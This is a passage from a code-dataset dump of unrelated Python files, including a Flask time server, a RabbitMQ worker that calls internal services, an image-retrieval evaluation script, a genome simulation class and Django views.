print(i)\r\n\r\nyesterday='2016-06-03'\r\nyesterday.index('-')\r\nnian=yesterday[0:4]\r\nyesterday[5:7]\r\nyesterday[8:10]\r\nnian\r\nyesterday.split('-')\r\nfenge=yesterday.split('-')\r\nfor i in fenge:\r\n print(i)\r\nprint('a,b,c'.split())\r\nprint('a\\tb\\tc'.split())\r\n\r\ni=123456\r\ndef test():\r\n global j\r\n j=0\r\n print(j)\r\ntest()\r\nprint(j)\r\n\r\n\r\ndef sum1(a,b):\r\n return (int(a)+int(b))\r\nwhile True:\r\n a=input(\"请输入第一个数:\")\r\n b=input(\"请输入第二个数:\")\r\n sum0=sum1(a,b)\r\n print(\"和是:\"+str(sum0))\r\n break\r\n\r\n\r\n#保存文件\r\nopen('state.txt','w').write('1')\r\n#读文件\r\na=open('state.txt','r').readline()\r\nif a=='0':\r\n print('菜单是:')\r\nelse:\r\n 
print('欢迎第一次使用,请登记你的名字!')\r\n print('菜单是:')","sub_path":"day2_下午练习.py","file_name":"day2_下午练习.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"357071578","text":"#!/usr/bin/python\nimport wx\nclass CONTROL_BUTTONS:\n\tdef __init__(self,RightPanel,event_handler):\n\t\ttmpPanel = wx.Panel(RightPanel,wx.ID_ANY)\n\t\ttmpPanel.SetBackgroundColour('#FFFFFF')\n\t\ttmplayout = wx.BoxSizer(wx.HORIZONTAL)\n\t\tbutton_generate = wx.Button(tmpPanel,989,\"Generate CODE!\")\n\t\tbutton_close = wx.Button(tmpPanel,999,\"Close\")\n\t\tbutton_generate.Bind(wx.EVT_BUTTON,event_handler)\n\t\tbutton_close .Bind(wx.EVT_BUTTON,event_handler)\n\t\ttmplayout.Add(button_generate,flag=wx.ALL|wx.ALIGN_RIGHT,border=5)\n\t\ttmplayout.Add(button_close ,flag=wx.ALL|wx.ALIGN_RIGHT,border=5)\n\t\ttmpPanel.SetSizer(tmplayout)\n\t\tbutton_generate.Disable()\n\t\tself.panel=tmpPanel\n\t\tself.button_generate=button_generate\n","sub_path":"store/gui/control_buttons.py","file_name":"control_buttons.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"183518567","text":"from sqlalchemy import Column, PrimaryKeyConstraint\nfrom sqlalchemy.dialects.postgresql import VARCHAR, INTEGER\n\nfrom .database import Base\n\nclass CourseCorequisite(Base):\n __tablename__ = 'course_corequisite'\n\n department = Column(VARCHAR(length=255))\n level = Column(INTEGER)\n corequisite = Column(VARCHAR(length=255))\n\n __table_args__ = (\n PrimaryKeyConstraint('department', 'level', 'corequisite'),\n )","sub_path":"src/api/tables/course_corequisite.py","file_name":"course_corequisite.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"404780588","text":"# Created by Krasimir Vatchinsky - KGV Consulting Corp - info@kgvconsultingcorp.com\n# This program help to compare inputed results from 3 sources, \n# if 2 results matched - are equal, print the result, if non result match discard all\n\n# set a Flag\nvalidResult = None\n\n# create empty list\ninputs = []\n\n# try/except method to catch non numerical value and rise and error warning the user\ntry:\n # loop to get 3 computer inputs\n for i in range(3):\n inputs.append( int( input('Enter computer ' + str(i + 1) + ' timed result: ') ) )\n\n# exception when the user input is non numerical entry rise an exception and warn to enter only numbers\nexcept Exception as e:\n print(\"Oops, something went wrong. 
Please enter only whole numerical format!\")\n\n# using for loop and booleon to iterate throughout the list with stored inputs\n# and check if there are at least two same timed results inputs, if they are print them as result \n# if no than print Discard results and close\nfor inputValue in inputs:\n if inputs.count(inputValue) > 1:\n validResult = inputValue\n\nif validResult is not None:\n print(\"Result is \" + str(validResult))\nelse:\n print(\"Discard results\")\n","sub_path":"compareInputs.py","file_name":"compareInputs.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198217942","text":"##########################################\nimport os\nimport numpy as np\nfrom numpy.linalg import norm\nfrom numpy import shape\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom PIL import Image\nimport pandas as pd\nfrom random import randint\nimport json\nimport random\nfrom tiny_imagenet_loader_final_results import tinyImageNetDataset\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import models\n##########################################\n# controls for the program\n# 0 for not blue waters, 1 for blue waters\nblue_waters = 0\n\n#choose the epoch model that you want to get the results from \nepoch_num = 12\n\nval_batch_size = 5\n##########################################\n# load things from training\n#TODO: dataframe misses the first entry in the annotations text file\nif blue_waters:\n src_dir = '/mnt/c/scratch/training/tra392/hw5/src'\n\nelse:\n src_dir = 'C:/home/classes/IE534_DL/hw5/src'\n\ntrain_data_dir = 'data/tiny-imagenet-200/train'\nval_data_dir = 'data/tiny-imagenet-200/val'\ntrain_annotations_path = os.path.join(src_dir, 'img_df.csv')\nval_annotations_path = os.path.join(src_dir, 'data/tiny-imagenet-200/val/val_annotations.txt')\nbackup_dir = os.path.join(src_dir, 'backup_resnet18')\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nif str(device) == 'cuda':\n print('cuda -> Using GPU powerrrrrrr')\nelse:\n print('lame, cpu...')\n\nval_transform =transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor()])\n\nval_dataset = tinyImageNetDataset(src_dir = src_dir, data_dir = val_data_dir, annotations_path = val_annotations_path, train = False, final_results = True,transform = val_transform)\n\n##########################################\n''' final results in words (took about 3 hours to modify the code and get the images looking decent)\n- done - sample 5 different images from validation set (each from a different class)\n- show top 10 ranked results (i.e. lowest Euclidean distance)\n- show the Euclidean distance between query image and ranked images\n- show bottom 10 ranked results (i.e. 
highest Euclidean distance)\n- describe at least one way you can improve the network performance (training speed, accuracy, etc.)\n-- be super descriptive, there is a possible answer in the paper you can use if you understand it\n'''\n\ndef final_results(epoch):\n # load data (the if is just so i can fold the code)\n load_data = 1\n if load_data:\n epoch_num = 'epoch_' + str(epoch)\n save_path = os.path.join(backup_dir, epoch_num)\n\n # load model\n model_fn = 'epoch_' + str(epoch) + '_resnet.ckpt'\n model_path = os.path.join(save_path, model_fn)\n\n #TODO: change for real dataset\n #model = models.resnet50().to('cuda')\n model = models.resnet18().to('cuda')\n model = torch.nn.Sequential(*(list(model.children())[:-1]))\n state_dict = torch.load(model_path)\n model.load_state_dict(state_dict)\n\n # load query image classes and paths\n # img_class_data = [class_name (str), img_fp (str)]\n class_buffer_fn = 'epoch_' + str(epoch) + '_class_buffer.txt'\n class_path = os.path.join(save_path, class_buffer_fn)\n with open(class_path, 'r') as f:\n img_class_data = json.load(f)\n\n #TODO: naming scheme doesn't transfer well between blue waters and my computer...\n classes = []\n paths_old = []\n paths = []\n for i in range(len(img_class_data)):\n classes.append(img_class_data[i][0])\n paths_old.append(img_class_data[i][1])\n\n src_dir_old = '/mnt/c/scratch/training/tra392/hw5/src'\n src_dir_new = 'C:/home/classes/IE534_DL/hw5/src'\n\n for i in paths_old:\n x = i.replace(src_dir_old, src_dir_new)\n paths.append(x)\n classes = np.array(classes)\n paths = np.array(paths)\n # load query image maps as tensors\n # q_maps[i, :] = feature maps corresponding to \n # image in classes[i]\n all_maps_fn = 'epoch_' + str(epoch) + '_all_maps.txt'\n all_maps_path = os.path.join(save_path, all_maps_fn)\n with open(all_maps_path, 'rb') as f:\n q_maps = torch.load(f)\n q_maps = q_maps.detach().numpy().squeeze()\n\n print('Data for epoch {} loaded'.format(epoch))\n ############################################\n model.eval()\n k = len(q_maps) # number of neighbors\n with torch.no_grad():\n print('\\n------------Final Results------------\\n')\n # q_maps[i, :] = feature maps corresponding to image in classes[i]\n # classes[i]\n # paths[i] \n knn_model = KNeighborsClassifier()\n knn_model.fit(q_maps, classes)\n \n # find results\n # with a batch size of 5, run only once to get required images from batch size\n # uses a modified version of the data loader, so that sucks for simplicity lol\n idx = np.arange(0, len(val_dataset))\n random.shuffle(idx)\n rand_idx = idx[0:5]\n figures_near = {}\n figures_far = {}\n \n # get a single validation image\n for i in rand_idx:\n data = val_dataset[i]\n img_array = np.flip(np.transpose(data[0]), 0)\n title = 'img' + str(i)\n figures_near[title] = img_array\n figures_far[title] = img_array\n\n img_tensor = data[0].unsqueeze(0)\n label = data[1]\n img_tensor = img_tensor.to(device)\n img_map = model(img_tensor)\n img_map_arr = img_map.cpu().numpy().squeeze()\n\n curr_val_map = img_map_arr.reshape([1,-1])\n dist, idx = knn_model.kneighbors(curr_val_map, n_neighbors=k)\n \n # get the 10 closest and furthers images\n idx_near = idx[:, 0:10]\n idx_far = idx[:, -10:]\n \n dist_near = dist[:, 0:10]\n dist_far = dist[:, -10:]\n \n class_near = classes[idx_near]\n class_far = classes[idx_far]\n \n paths_near = paths[idx_near]\n paths_far = paths[idx_far]\n\n # add the 10 nearest and furthest images to dicts for plotting later\n for j in range(10):\n img_near = 
np.flip(np.array(Image.open(paths_near[:, j][0])), 0)\n img_far = np.flip(np.array(Image.open(paths_far[:, j][0])), 0)\n\n dist_n = dist_near[:, j]\n dist_f = dist_far[:, j]\n\n figures_near[str(dist_n)] = img_near\n figures_far[str(dist_f)] = img_far\n\n plot_figures(figures_near, 5, 11)\n plot_figures(figures_far, 5, 11)\n\ndef plot_figures(figures, nrows = 1, ncols=1):\n \"\"\"Plot a dictionary of figures.\n https://stackoverflow.com/questions/11159436/multiple-figures-in-a-single-window\n Parameters\n ----------\n figures : dictionary\n ncols : number of columns of subplots wanted in the display\n nrows : number of rows of subplots wanted in the figure\n \"\"\"\n\n fig, axeslist = plt.subplots(ncols=ncols, nrows=nrows)\n for ind,title in enumerate(figures):\n axeslist.ravel()[ind].imshow(figures[title], cmap=plt.gray())\n axeslist.ravel()[ind].set_title(title,backgroundcolor = 'white', fontsize = 14.5)\n axeslist.ravel()[ind].set_axis_off()\n plt.tight_layout() # optional\n plt.show()\n\n\n\n\n\ndef plotting(show_plot, save_plot, plot_fn):\n # loss[i] = loss for epoch i\n loss_fn = 'loss.txt'\n loss_path = os.path.join(backup_dir, loss_fn)\n with open(loss_path, 'r') as f:\n loss = json.load(f) \n epochArr = np.linspace(1, num_epochs, num_epochs)\n \n ax2 = plt.subplot(212)\n #ax2.set_title('Loss vs. Epochs')\n ax2.plot(epochArr, train_loss, label = 'Loss - Training Dataset')\n ax2.set_xlabel('Epoch')\n ax2.set_ylabel('Loss')\n handles, labels = ax2.get_legend_handles_labels()\n ax2.legend(handles, labels) \n ax2.set_xticks(np.rint(epochArr))\n\n ax1 = plt.subplot(211, sharex = ax2)\n #ax1.set_title('Accuracy vs. Epochs')\n ax1.plot(epochArr, test_acc, label = 'Accuracy - Validation Dataset')\n ax1.set_ylabel('Accuracy (percent)')\n ax1.set_ylim(ymax = 100, ymin = 0)\n handles, labels = ax1.get_legend_handles_labels()\n ax1.legend(handles, labels)\n plt.setp(ax1.get_xticklabels(), visible=False) \n \n if show_plot: \n plt.show()\n\n if save_plot:\n plt.savefig(plot_fn, dpi = 200)\n\ndef showImage(q_gpu, p_gpu, n_gpu):\n q_cpu = q_gpu.cpu()\n p_cpu = p_gpu.cpu()\n n_cpu = n_gpu.cpu()\n\n q_arr = q_cpu.numpy().transpose().squeeze()\n p_arr = p_cpu.numpy().transpose().squeeze()\n n_arr = n_cpu.numpy().transpose().squeeze()\n \n img_arr = np.concatenate((q_arr, p_arr, n_arr), axis = 1)\n plt.imshow(img_arr)\n plt.axis('off') \n plt.show()\n\nif __name__ == \"__main__\":\n final_results(epoch_num)\n\n\n\n\n","sub_path":"hw5/src/final_results.py","file_name":"final_results.py","file_ext":"py","file_size_in_byte":9219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"81079055","text":"#!/usr/bin/env python\n\nimport datetime\nimport os\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef epoch_time():\n return str(datetime.datetime.now().timestamp())\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 6378))\n app.run(host=\"0.0.0.0\", port=port, debug=True)\n","sub_path":"time/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"128344011","text":"def application(environ, start_response):\n # set paths\n import sys, os\n sys.path.append('/var/repos/')\n os.environ['MPLCONFIGDIR'] = '/var/repos/.matplotlib'\n os.environ['GDAL_DATA'] = 'usr/share/gdal/1.9'\n\n try:\n from werkzeug.wrappers import Response, Request\n import openhydro as oh\n except Exception as e:\n out=\"Error 
while loading: {0}.\".format(e.message)\n response = Response(out)\n return response(environ, start_response)\n \n # change the profile to hydro_freiburg\n oh.change_profile(\"hydro_freiburg\")\n\n ### Handle the Request\n request = Request(environ)\n \n if 'icon' in request.args:\n _icon_href = request.args['icon']\n else:\n _icon_href = 'http://maps.google.com/mapfiles/kml/paddle/purple-circle.png'\n \n if 'operation' in request.args:\n _operation = request.args['operation']\n else:\n _operation = '__collection__'\n \n try:\n# lst = oh.allStations()\n lst = oh.allSensors(operation=_operation, replace={'###_cols_###':'id, name || \\'(ID: \\' || id || \\')\\' as title, proj4, location as geometry, owner as \"Besitzer\",datapoints as \"Messpunkte\", \\'von \\' || start || \\' bis \\' || \"end\" as \"Zeitraum\", min, mean, max '})\n except:\n out = \"The Sensors could not be grabbed.\"\n\n try:\n # toggle _op\n if 'link_operation' in request.args:\n _op = \"&operation={0}\".format(request.args['link_operation'])\n else:\n _op = \"\"\n out = lst.__kml__(icon_href=_icon_href, exclude_fields=['id', 'title', 'proj4', 'geometry', 'geom'], link_text=\"Zum Sensor ...\", link_href=\"http://openhydro.de/index.php/details.html?sensor=###_id_###&profile=hydro_freiburg{0}&baseurl=http://openhydro.de/index.php/details.html\".format(_op))\n except Exception as e:\n out = \"KML creation abortet on Python Error: {0}\".format(e.message) \n\n ### return routine\n response = Response(out)\n response.headers['content-type'] = 'application/vnd.google-earth.kml+xml'\n response.headers['Content-Disposition'] = 'attachment; filename=hydro_freiburg.kml'\n return response(environ, start_response)\n","sub_path":"web/hydro_freiburg.kml.py","file_name":"hydro_freiburg.kml.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"229329648","text":"# The naïve unit test for writerRNN using Hydrogen on Atom\n\n# %% Commonly used libraries and variables\nimport numpy as np\nimport os\nimport string\nfrom collections import Counter\nimport re\nfrom importlib import reload\nimport writerRNN\nimport torch.nn as nn\nimport torch\npath = writerRNN.PATH\nALL_CHARS = writerRNN.ALL_CHARS\n\n# %% utf8_to_ascii for ALL_CHARS including numbers of punctuations\nfile = '666-temp-by-foo.txt'\nwriterRNN.utf8_to_ascii(\n 'Pendant plusieurs jours de suite des lambeaux d\\'armée en déroute avaient traversé la ville.')\nwriterRNN.utf8_to_ascii(\n 'SONNET 18\\t Shall I compare thee to a summer’s day?\\nThou art more lovely and more temperate.\\n Rough winds do shake the darling buds of May,\\n And summer’s lease hath all too short a date.')\n\n# %% read from files: note the pass-by-object property of python!\nfiles = writerRNN.list_by_extension(path)\nfile = files[1]\nfile\ntext = writerRNN.read_text_from_file(file)\ntext[:50]\n\n# %% clean up text!\nsmall_text = '\\tSONNET 18\\n\\nShall I compare thee to a summers day?\\nThou art more lovely -- and more temperate.'\nsmall_1 = small_text.replace('--', ' ')\nsmall_1 # remove '--'\nsmall_2 = small_1.translate(str.maketrans({key: \" {0} \".format(\n key) for key in (string.whitespace + string.punctuation)}))\nsmall_2 # whitespace between word and non-words\nsmall_3 = small_2\n# small_3 = small_2[1:-1]\n# small_3 # remove whitespace at head & tail\nsmall_4 = re.sub(\" +\", \" \", small_3)\nsmall_4 # compress whitespaces\nsmall_5 = re.split(r'( +)', small_4)\nsmall_5 # split on whitespace\nsmall_6 = 
[t.casefold() for t in small_5]\nsmall_6 # make everything lowercase\nsmall_cleaned = small_6\nreload(writerRNN)\nwriterRNN.clean_text(small_text)\n\n\n# %% fetch_data testing\nraw_text = writerRNN.read_text_from_file(file, path)\nclean_text = writerRNN.clean_text(raw_text)\nvocabulary = Counter(clean_text)\nassert (len(vocabulary) <= len(clean_text))\ntext, encoder, decoder = writerRNN.fetch_data(file, path, verbose=True)\n\n# =========================================================\n# End of Phase 1 data preparation\n\n# %%\nfile_name = file\ntext, encoder, decoder\nn_vocab = len(encoder)\n\nseq_size = 32\nembedding_size = 64\nlstm_size = 64\nrnn = writerRNN.writerRNN(n_vocab, seq_size, embedding_size, lstm_size)\n\ncriterion = nn.CrossEntropyLoss()\nlr = 0.001\noptimizer = torch.optim.Adam(rnn.parameters(), lr=lr)\n\n# =========================================================\n# End of Phase 2 model declaration\n\n\n# %%\nlen(text)\nencoder\nreload(writerRNN)\nencoded_in, encoded_out = writerRNN.load_batches(\n text * 5, encoder, 4, 16, verbose=True)\nbatch_in = np.reshape(encoded_in, (16, -1))\nbatch_in.shape\nbatch_out = np.reshape(encoded_out, (16, -1))\nbatch_out.shape\n\nxx, yy = [], []\nfor i in range(0, 23 * 4, 4):\n xx.append(batch_in[:, i:i + 4])\nlen(xx)\n\nreload(writerRNN)\nxx, yy = writerRNN.load_batches(text * 5, encoder, 4, 16, verbose=True)\n\nlen(xx)\nxx[0].shape\n\nstring.whitespace\n# =================== End of data loading\n\n\n# %% Train\nbatch_size = 16\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# %%\nreload(writerRNN)\ntype(n_vocab)\ntype(embedding_size)\n\n\nwriterRNN.fit_model(rnn, device, encoder, criterion, lr, optimizer, batch_size, xx, yy,\n n_epoch=3, verbose=True, save_model=False, print_every=1, save_every=2)\n","sub_path":"rNN/writerRNN_test.py","file_name":"writerRNN_test.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"167616804","text":"#!usr/bin/env python\n\"\"\"Module for generating filtered file\"\"\"\nimport json\nfrom flask import send_file, send_from_directory, safe_join, abort\nimport requests\nfrom file_gen_service.utils.csv_generator import generate_filtered_csv_file\nfrom file_gen_service.utils.xlsx_generator import generate_filtered_xlsx_file\nfrom file_gen_service.configs.logger import LOGGER\n\n\n# def post_request_to_file_service(file_path):\n# file_url = \"http://web-file:5000/files\"\n# try:\n# file = open(file_path, 'rb')\n# files_to_load = {'user_file': file}\n# except FileNotFoundError as err:\n# LOGGER.info(err)\n# LOGGER.info(\"--------------------- CANT OPEN FIL\")\n#\n# result = requests.post(\n# url=file_url,\n# files=files_to_load\n# )\n\ndef post_request_to_sharing_service(file_path):\n sharing_url = \"http://web-sharing:5000/download\"\n try:\n file = open(file_path, 'rb')\n file_to_load = {'generated_file': file}\n except FileNotFoundError as err:\n LOGGER.error(err)\n LOGGER.error(\"----------------CANT'T OPEN FILE\")\n\n result = requests.post(\n url=sharing_url,\n files=file_to_load\n )\n\n\ndef request_to_file_service(file_id):\n \"\"\"\n The method for request to file service, to get the path to the file.\n Args:\n file_id:\n The ID of the file you want to get.\n Returns:\n file_path:\n The path to the file.\n \"\"\"\n\n result_of_request = requests.get(\n url=f'http://web-file:5000/file/{file_id}'\n )\n\n if result_of_request.status_code == 200:\n data = result_of_request.json()\n 
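# for reference, the file service is expected to reply with JSON of the form {\"path\": \"<path to the stored file>\"} - \"path\" is the only field this worker reads below\n        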
LOGGER.info('Success request to file service')\n file_path = data['path']\n return file_path\n else:\n LOGGER.error('Error request to file service')\n return None\n\n\ndef request_to_history_service(session, file_id, filter_id):\n \"\"\"\n The method for request to history service, to get the rows id of the filtered file.\n Args:\n session:\n The user session for which you want to get filtered rows.\n file_id:\n The ID of the file you want to get.\n filter_id:\n The filter ID for which you want to get the filtered rows.\n Returns:\n rows_id:\n The line numbers that were obtained after filtering the file by the user.\n \"\"\"\n\n result_of_request = requests.get(\n url=f'http://web-history:5000/history/file/{file_id}/filter/{filter_id}',\n cookies={'session': session}\n )\n if result_of_request.status_code == 200:\n data = result_of_request.json()\n LOGGER.info('Success request to history service')\n rows_id = data['rows_id']\n return rows_id\n else:\n LOGGER.error('Error request to history service')\n return None\n\n\ndef callback(ch, method, properties, body):\n \"\"\"\n A function that is called when a message is received from a queue\n and performs basic manipulations, ie requests to other services\n and a call to functions that will generate a new file.\n Args:\n ch:\n Virtual connection, inside another connection between producer and consumer.\n method:\n Method of data transmission between producer and consumer.\n properties:\n pika.spec.BasicProperties\n body:\n The message, in bytes, that is transmitted between the producer and the consumer.\n Returns:\n new_file_path:\n The path to the generated file.\n \"\"\"\n\n req = json.loads(body)\n session = req['session']\n file_id = req['file_id']\n filter_id = req['filter_id']\n\n try:\n file_path = request_to_file_service(file_id)\n rows_id = request_to_history_service(session, file_id, filter_id)\n except TypeError:\n LOGGER.error('Poor response from services...')\n return None\n\n if file_path.endswith('csv'):\n new_file_path = generate_filtered_csv_file(file_path, rows_id)\n elif file_path.endswith(('xls', 'xlsx')):\n new_file_path = generate_filtered_xlsx_file(file_path, rows_id)\n else:\n LOGGER.error('Poor file name...')\n return None\n\n post_request_to_sharing_service(new_file_path)\n #post_request_to_file_service(new_file_path)\n\n","sub_path":"file_gen_service/rabbit_folder/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"532116663","text":"from Genome.AbstractGenome import AbstractGenome\nimport random, configparser\nimport gene as G\n\nclass Linear(AbstractGenome):\n\n\tdef __init__(self):\n\t\tconfig = configparser.ConfigParser()\n\t\tconfig.read(\"config.ini\")\n\t\tself.length = int(config[(\"Genome.\"+type(self).__name__).upper()]['length'])\n\t\tself.promoter = config[(\"Genome.\"+type(self).__name__).upper()]['promoter']\n\t\tself.protSize = int(config[(\"Genome.\"+type(self).__name__).upper()]['protSize'])\n\t\tself.inhSize = int(config[(\"Genome.\"+type(self).__name__).upper()]['inhSize'])\n\t\tself.enhSize = int(config[(\"Genome.\"+type(self).__name__).upper()]['enhSize'])\n\t\tself.protSeqMult = int(config[(\"Genome.\"+type(self).__name__).upper()]['protSeqMult'])\n\t\tself.geneLength = self.inhSize + self.enhSize + (self.protSize * self.protSeqMult) + len(self.promoter)\n\t\tself.DNA = []\n\t\tself.genes = []\n\t\tself.fitness = 0\n\n\t# This is to automatically generate the config 
file for this class\n\t@staticmethod\n\tdef gConfig():\n\t\tconf = {\n\t\t\t\"length\" : 5000,\n\t\t\t\"promoter\" : \"01010101\", \n\t\t\t\"enhSize\" : 32,\n\t\t\t\"inhSize\" : 32,\n\t\t\t\"protSize\" : 32,\n\t\t\t\"protSeqMult\" : 5\n\t\t}\n\t\treturn conf\n\t\n\t# Initializes the genome and finds the genes\n\tdef initialize(self, requirements): \n\t\tinputCount = requirements['inputs']\n\t\toutputCount = requirements['outputs']\n\t\tself.DNA = [random.randint(0,1) for b in range(1,self.length+1)]\n\t\tself.findGenes()\n\t\t# for all the inputs add an input gene. Inputs regulate but don't get regulated. We want all the inputs to have the same impact and for the concentrations to play the main role. We don't care about the promoter, enhancer or inhibitor regions. So, the only thing we want is the same protein sequence for the inputs which means that they effect eachother as low as possible and effect the other genes equally as much. \n\t\t\n\t\tfor i in range(inputCount):\n\t\t\tself.genes.append(G.Gene(\"11111111\", [0 for b in range(self.enhSize)], [0 for b in range(self.inhSize)], [0 for b in range(self.protSize)], \"I\"))\n\t\t# for all the outputs add an output gene. Outputs don't regulate but get regulated. We want all the genes to have different impacts on the outputs. So, we want them to be as different as possible. \n\t\tfor i in range(outputCount):\n\t\t\tpattern = []\n\t\t\tcomp_pattern = []\n\t\t\tfor j in range(self.enhSize):\n\t\t\t\tif j >= i * (self.protSize/outputCount) and j < (i+1) * (self.protSize/outputCount):\n\t\t\t\t\tpattern.append(1)\n\t\t\t\t\tcomp_pattern.append(0)\n\t\t\t\telse:\n\t\t\t\t\tpattern.append(0)\n\t\t\t\t\tcomp_pattern.append(1)\n\t\t\tself.genes.append(G.Gene(\"00000000\", pattern, comp_pattern, [0 for b in range(self.protSize)], \"O\"))\n\t\tself.resetConcentrations()\n\t\t# for gene in self.genes:\n\t\t# \tgene.print()\n\t\tpass\n\n\tdef reinitialize(self, requirements):\n\t\tinputCount = requirements['inputs']\n\t\toutputCount = requirements['outputs']\n\t\tself.genes = []\n\t\tself.findGenes()\n\t\t# for all the inputs add an input gene. Inputs regulate but don't get regulated. We want all the inputs to have the same impact and for the concentrations to play the main role. We don't care about the promoter, enhancer or inhibitor regions. So, the only thing we want is the same protein sequence for the inputs which means that they effect eachother as low as possible and effect the other genes equally as much. \n\t\t\n\t\tfor i in range(inputCount):\n\t\t\tself.genes.append(G.Gene(\"11111111\", [0 for b in range(self.enhSize)], [0 for b in range(self.inhSize)], [0 for b in range(self.protSize)], \"I\"))\n\t\t# for all the outputs add an output gene. Outputs don't regulate but get regulated. We want all the genes to have different impacts on the outputs. So, we want them to be as different as possible. \n\t\tfor i in range(outputCount):\n\t\t\tpattern = []\n\t\t\tcomp_pattern = []\n\t\t\tfor j in range(self.enhSize):\n\t\t\t\tif j >= i * (self.protSize/outputCount) and j < (i+1) * (self.protSize/outputCount):\n\t\t\t\t\tpattern.append(1)\n\t\t\t\t\tcomp_pattern.append(0)\n\t\t\t\telse:\n\t\t\t\t\tpattern.append(0)\n\t\t\t\t\tcomp_pattern.append(1)\n\t\t\tself.genes.append(G.Gene(\"00000000\", pattern, comp_pattern, [0 for b in range(self.protSize)], \"O\"))\n\t\tself.resetConcentrations()\n\n\n\t# Finds genes in a DNA. 
Format: [Promoter -> Enhancer -> Inhibitor -> n * protSize]\n\tdef findGenes(self):\n\t\tself.genes = []\n\t\tfor i in range(len(self.DNA)-len(self.promoter)-self.protSize*self.protSeqMult-self.enhSize-self.inhSize-1):\n\t\t\tif ''.join(str(e) for e in self.DNA[i:i+len(self.promoter)]) == self.promoter:\n\t\t\t\tenhancer = self.DNA[i+len(self.promoter)+1:i+len(self.promoter)+1+self.enhSize]\n\t\t\t\tinhibitor = self.DNA[i+len(self.promoter)+1+self.enhSize:i+len(self.promoter)+1+self.enhSize+self.inhSize]\n\t\t\t\ti += len(self.promoter) + self.enhSize + self.inhSize\n\t\t\t\t# use the majority rule over the protSeqMult repeats to derive the protein sequence\n\t\t\t\tprotein = []\n\t\t\t\tfor j in range(self.protSize):\n\t\t\t\t\tones = 0\n\t\t\t\t\tzeroes = 0\n\t\t\t\t\tfor k in range(self.protSeqMult):\n\t\t\t\t\t\tif self.DNA[i + j + k * self.protSize] == 1: \n\t\t\t\t\t\t\tones += 1\n\t\t\t\t\t\telse: \n\t\t\t\t\t\t\tzeroes += 1 \n\t\t\t\t\tif ones >= zeroes: # ties favor 1s over 0s\n\t\t\t\t\t\tprotein.append(1)\n\t\t\t\t\telse: \n\t\t\t\t\t\tprotein.append(0)\t\n\t\t\t\t# print (\"enhancer: {} inhibitor: {} protein: {}\".format(enhancer, inhibitor, protein))\n\t\t\t\ti += (self.protSeqMult * self.protSize)\n\t\t\t\tself.genes.append(G.Gene(self.promoter, enhancer, inhibitor, protein, \"TF\"))\n\n\t# Returns the genes\n\tdef getGenes(self):\n\t\treturn self.genes\n\n\tdef setFitness(self, fitness):\n\t\tself.fitness = fitness\n\n\tdef getFitness(self):\n\t\treturn self.fitness\n\n\tdef addInputGenes(self):\n\t\tpass\n\n\tdef addOutputGenes(self):\n\t\tpass\n\n\tdef getDNA(self):\n\t\treturn self.DNA\n\t\t\n\tdef addGene(self):\n\t\tself.DNA += [random.randint(0,1) for b in range(self.geneLength)]\n\n\tdef resetConcentrations(self):\n\t\tfor gene in self.genes:\n\t\t\tgene.concentration = 1 / len(self.genes)\n\n","sub_path":"Genome/Linear.py","file_name":"Linear.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"91656064","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render,get_object_or_404, redirect, Http404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib import messages\nfrom .models import MainContent\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\n\nfrom django.http import *\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom .forms import MainContentForm\n\n\n\ndef main_create(request):\n \n    if request.user.is_staff or request.user.is_superuser:\n        form = MainContentForm(request.POST or None, request.FILES or None)\n        if form.is_valid():\n            instance = form.save(commit=False)\n            instance.user = request.user\n            instance.save()\n            return HttpResponseRedirect(\"/\")\n        else:\n        \tpass\n        \n\n\n        context = {\n            \"form\" : form,\n        }\n        return render(request, \"post_form.html\", context)\n    else:\n        raise Http404\n\ndef main_view(request, id=None):\n\n\n    instance = get_object_or_404(MainContent, id=1 )\n\n\n    context = {\n        \"title\": instance.title,\n        \"instance\": instance,\n        \"img\" : instance.image\n\n\n    }\n    return render(request, \"main_page.html\", context)\ndef page_view(request, id=None):\n\n\n    instance = get_object_or_404(MainContent, id=3 )\n\n\n    context = {\n        \"title\": instance.title,\n        \"instance\": instance,\n        \"img\" : instance.image\n\n\n    }\n    return render(request, \"elerhetosegek.html\", context)\n
